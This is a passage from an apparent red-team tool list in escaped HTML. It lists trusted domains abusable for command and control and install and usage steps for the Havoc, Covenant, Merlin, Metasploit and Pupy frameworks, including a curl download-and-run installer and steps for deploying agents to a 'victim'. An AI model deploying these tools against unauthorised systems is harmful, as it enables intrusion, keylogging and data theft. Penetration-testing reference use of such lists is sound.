sites that can be used.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit \u003ca href=\"https://lots-project.com/\" rel=\"nofollow\"\u003ehttps://lots-project.com/\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSearch for \u003ccode\u003e+C\u0026amp;C\u003c/code\u003e in the search bar to view all potential domains / subdomains that can be used for command and control operations.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eResults include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eraw.githubusercontent.com\u003c/li\u003e\n\u003cli\u003edocs.google.com\u003c/li\u003e\n\u003cli\u003e*.azurewebsites.net\u003c/li\u003e\n\u003cli\u003edropbox.com\u003c/li\u003e\n\u003cli\u003e*.amazonaws.com\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://lots-project.com/\" rel=\"nofollow\"\u003ehttps://lots-project.com/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/HavocFramework/Havoc\"\u003eHavoc\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-havoc\" class=\"anchor\" aria-label=\"Permalink: 🔙Havoc\" href=\"#havoc\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eHavoc is a modern and malleable post-exploitation command and control framework, created by \u003ca href=\"https://twitter.com/C5pider\" rel=\"nofollow\"\u003e@C5pider\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures include: Sleep Obfuscation, x64 return address spoofing, Indirect Syscalls for Nt* APIs\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePre-requisites:\u003c/strong\u003e (Ubuntu 20.04 / 22.04)\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install build-essential\nsudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt update\nsudo apt install python3.10 python3.10-dev\"\u003e\u003cpre\u003esudo apt install build-essential\nsudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt update\nsudo apt install python3.10 python3.10-dev\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eBuild + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/HavocFramework/Havoc.git\ncd Havoc/Client\nmake \n./Havoc \"\u003e\u003cpre\u003egit clone https://github.com/HavocFramework/Havoc.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Havoc/Client\nmake \n./Havoc \u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePre-requisites:\u003c/strong\u003e (Ubuntu 20.04 / 22.04)\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"cd Havoc/Teamserver\ngo mod download golang.org/x/sys \ngo mod download github.com/ugorji/go\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Havoc/Teamserver\ngo mod download golang.org/x/sys \ngo mod download github.com/ugorji/go\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eBuild + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"cd Teamserver\n./Install.sh\nmake\n./teamserver -h\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Teamserver\n./Install.sh\nmake\n./teamserver -h\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eRun the teamserver\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug\"\u003e\u003cpre\u003esudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eFull install, build and run instructions on the \u003ca href=\"https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD\"\u003ewiki\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/cobbr/Covenant\"\u003eCovenant\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-covenant\" class=\"anchor\" aria-label=\"Permalink: 🔙Covenant\" href=\"#covenant\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eCovenant is a .NET command and control framework, it has a web interface that allows for multi-user collaboration.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Dotnet Core)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can download dotnet core for your platform from \u003ca href=\"https://dotnet.microsoft.com/download/dotnet-core/3.1\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eAfter starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone --recurse-submodules https://github.com/cobbr/Covenant\ncd Covenant/Covenant\"\u003e\u003cpre\u003egit clone --recurse-submodules https://github.com/cobbr/Covenant\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Covenant/Covenant\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Dotnet Core)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"~/Covenant/Covenant \u0026gt; dotnet run\nwarn: Microsoft.EntityFrameworkCore.Model.Validation[10400]\n Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.\nWARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.\nCovenant has started! Navigate to https://127.0.0.1:7443 in a browser\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e dotnet run\nwarn: Microsoft.EntityFrameworkCore.Model.Validation[10400]\n Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.\nWARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.\nCovenant has started\u003cspan class=\"pl-k\"\u003e!\u003c/span\u003e Navigate to https://127.0.0.1:7443 \u003cspan class=\"pl-k\"\u003ein\u003c/span\u003e a browser\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Docker)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Build the docker image:\ngit clone --recurse-submodules https://github.com/cobbr/Covenant\ncd Covenant/Covenant\n~/Covenant/Covenant \u0026gt; docker build -t covenant .\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Build the docker image:\u003c/span\u003e\ngit clone --recurse-submodules https://github.com/cobbr/Covenant\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Covenant/Covenant\n\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e docker build -t covenant \u003cspan class=\"pl-c1\"\u003e.\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Docker)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run Covenant within the Docker container\n~/Covenant/Covenant \u0026gt; docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v \u0026lt;/absolute/path/to/Covenant/Covenant/Data\u0026gt;:/app/Data covenant\n\n# Stop the container\n~/Covenant/Covenant \u0026gt; docker stop covenant\n\n# Restart Covenant interactively\n~/Covenant/Covenant \u0026gt; docker start covenant -ai\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run Covenant within the Docker container\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003e/absolute/path/to/Covenant/Covenant/Data\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e:/app/Data covenant\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Stop the container\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e docker stop covenant\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Restart Covenant interactively\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/Covenant/Covenant \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e docker start covenant -ai\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull installation and startup instructions can be found on the wiki \u003ca href=\"https://github.com/cobbr/Covenant/wiki/Installation-And-Startup\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage from \u003ca href=\"https://github.com/cobbr/Covenant\"\u003ehttps://github.com/cobbr/Covenant\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Ne0nd0g/merlin\"\u003eMerlin\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-merlin\" class=\"anchor\" aria-label=\"Permalink: 🔙Merlin\" href=\"#merlin\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMerlin is an open-source post-exploitation framework that is designed to be used after a initial compromise of a system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eDownload the latest compiled version of Merlin Server from the \u003ca href=\"https://github.com/Ne0nd0g/merlin/releases\"\u003ereleases\u003c/a\u003e section\u003c/li\u003e\n\u003cli\u003eExtract the files with 7zip using the x function The password is: merlin\u003c/li\u003e\n\u003cli\u003eStart Merlin\u003c/li\u003e\n\u003cli\u003eConfigure a \u003ca href=\"https://merlin-c2.readthedocs.io/en/latest/server/menu/listeners.html\" rel=\"nofollow\"\u003elistener\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeploy an agent. See \u003ca href=\"https://merlin-c2.readthedocs.io/en/latest/quickStart/agent.html\" rel=\"nofollow\"\u003eAgent Execution Quick Start Guide\u003c/a\u003e for examples\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"mkdir /opt/merlin;cd /opt/merlin\nwget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z\n7z x merlinServer-Linux-x64.7z\nsudo ./merlinServer-Linux-x64\"\u003e\u003cpre\u003emkdir /opt/merlin\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e /opt/merlin\nwget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z\n7z x merlinServer-Linux-x64.7z\nsudo ./merlinServer-Linux-x64\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eEnsure the Merlin server is running with a configured listener\u003c/li\u003e\n\u003cli\u003eDownload and deploy an agent to the victim\u003c/li\u003e\n\u003cli\u003eExecute agent\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003eFor detailed usage information see the official Merlin \u003ca href=\"https://merlin-c2.readthedocs.io/en/latest/server/menu/main.html\" rel=\"nofollow\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage from \u003ca href=\"https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks\" rel=\"nofollow\"\u003ehttps://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/rapid7/metasploit-framework\"\u003eMetasploit Framework\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-metasploit-framework\" class=\"anchor\" aria-label=\"Permalink: 🔙Metasploit Framework\" href=\"#metasploit-framework\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMetasploit is an open-source framework for developing, testing, and using exploit code.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Installer)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \u0026gt; msfinstall \u0026amp;\u0026amp; \\\n chmod 755 msfinstall \u0026amp;\u0026amp; \\\n ./msfinstall\"\u003e\u003cpre\u003ecurl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e msfinstall \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e \\\n chmod 755 msfinstall \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e \\\n ./msfinstall\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"/opt/metasploit-framework/bin/msfconsole\"\u003e\u003cpre\u003e/opt/metasploit-framework/bin/msfconsole\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull installation instructions can be found on the official \u003ca href=\"https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html\" rel=\"nofollow\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://www.rapid7.com/blog/tag/metasploit/\" rel=\"nofollow\"\u003eRapid7 Metasploit blogs\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet.webp\" rel=\"nofollow\"\u003eCheat sheet graphic\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://github.com/security-cheatsheet/metasploit-cheat-sheet\"\u003eNice command list\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://goacademy.io/how-to-install-metasploit-on-kali-linux/\" rel=\"nofollow\"\u003ehttps://goacademy.io/how-to-install-metasploit-on-kali-linux/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/n1nj4sec/pupy\"\u003ePupy\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-pupy\" class=\"anchor\" aria-label=\"Permalink: 🔙Pupy\" href=\"#pupy\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv\ngit clone --recursive https://github.com/n1nj4sec/pupy\ncd pupy\npython create-workspace.py -DG pupyw\"\u003e\u003cpre\u003esudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv\ngit clone --recursive https://github.com/n1nj4sec/pupy\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e pupy\npython create-workspace.py -DG pupyw\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eRoll fix to fix the error:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo pip2 install rpyc==3.4.4\"\u003e\u003cpre\u003esudo pip2 install rpyc==3.4.4\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eStart:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"export PATH=$PATH:~/.local/bin; pupysh\npupyws/bin/pupysh\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003eexport\u003c/span\u003e PATH=\u003cspan class=\"pl-smi\"\u003e$PATH\u003c/span\u003e:\u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/.local/bin\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e pupysh\npupyws/bin/pupysh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eGit install instructions used from \u003ca href=\"https://kalitut.com/how-to-install-pupy/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Docker)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFor detailed docker and pupy installation instructions see the \u003ca href=\"https://github.com/n1nj4sec/pupy/wiki/Installation\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Get help page for any builtin commands with -h\n\u0026gt;\u0026gt; sessions -h\n\u0026gt;\u0026gt; jobs -h\n\u0026gt;\u0026gt; run -h\n\n# Interact with session 1\n\u0026gt;\u0026gt; sessions -i 1\n\n# Run local command 'ls'\n\u0026gt;\u0026gt; !ls\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get help page for any builtin commands with -h\u003c/span\u003e\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e sessions -h\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ejobs\u003c/span\u003e -h\n\u003cspan class=\"pl-k\"\u003e\u0026gt;\u0026gt;\u003c/span\u003e run -h\n\n\u003cspan 